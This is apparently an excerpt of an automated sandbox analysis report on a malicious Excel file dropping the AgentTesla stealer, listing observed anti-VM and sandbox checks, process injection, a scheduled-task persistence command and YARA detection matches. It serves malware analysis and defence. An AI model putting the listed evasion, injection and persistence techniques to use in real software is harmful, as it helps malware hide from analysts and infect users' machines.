                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess information set: NOOPENFILEERRORBOX
                      Source: Doc2.xlsxStream path 'EncryptedPackage' entropy: 7.99880681599 (max. 8.0)

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: vbc.exe, 00000006.00000002.2229803981.0000000002311000.00000004.00000001.sdmp, MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\Public\vbc.exeWindow / User API: threadDelayed 9502Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWindow / User API: threadDelayed 9500
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1952Thread sleep time: -360000s >= -30000sJump to behavior
                      Source: C:\Users\Public\vbc.exe TID: 1276Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\Public\vbc.exe TID: 2408Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\Public\vbc.exe TID: 1028Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                      Source: C:\Users\Public\vbc.exe TID: 1028Thread sleep time: -150000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1312Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 856Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2480Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2260Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 2156Thread sleep time: -360000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304Thread sleep time: -150000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1272Thread sleep count: 9500 > 30
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1272Thread sleep count: 245 > 30
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe TID: 1304Thread sleep count: 104 > 30
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\Public\vbc.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeLast function: Thread delayed
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\Public\vbc.exeThread delayed: delay time: 30000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeThread delayed: delay time: 30000
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: vbc.exe, 00000006.00000002.2233213372.0000000005223000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: MLdAu.exe, 0000000B.00000002.2335458220.0000000001FF1000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess token adjusted: Debug
                      Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory written: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeMemory written: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmpB2BC.tmp'Jump to behavior
                      Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp7511.tmp'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\WzyRXCWtdGSdEA' /XML 'C:\Users\user\AppData\Local\Temp\tmp74F2.tmp'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeProcess created: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe {path}Jump to behavior
                      Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: vbc.exe, 00000009.00000002.2370335356.0000000000CA0000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
                      Source: C:\Users\Public\vbc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exeQueries volume information: C:\Users\user\AppData\Roaming\MLdAu\MLdAu.exe VolumeInformation
                      Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\Public\vbc.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 BlobJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000012.00000002.2336318504.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2341517856.0000000003191000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2369735651.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2369629595.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.2342137023.0000000002FF1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230917923.00000000034B9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2230665557.0000000003311000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2964, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2370417505.0000000002251000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.2370313444.0000000001FD1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000012.00000002.2338492595.0000000002261000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2148, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.MLdAu.exe.30ee310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.MLdAu.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.vbc.exe.340e310.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.MLdAu.exe.328e310.3.unpack, type: UNPACKEDPE
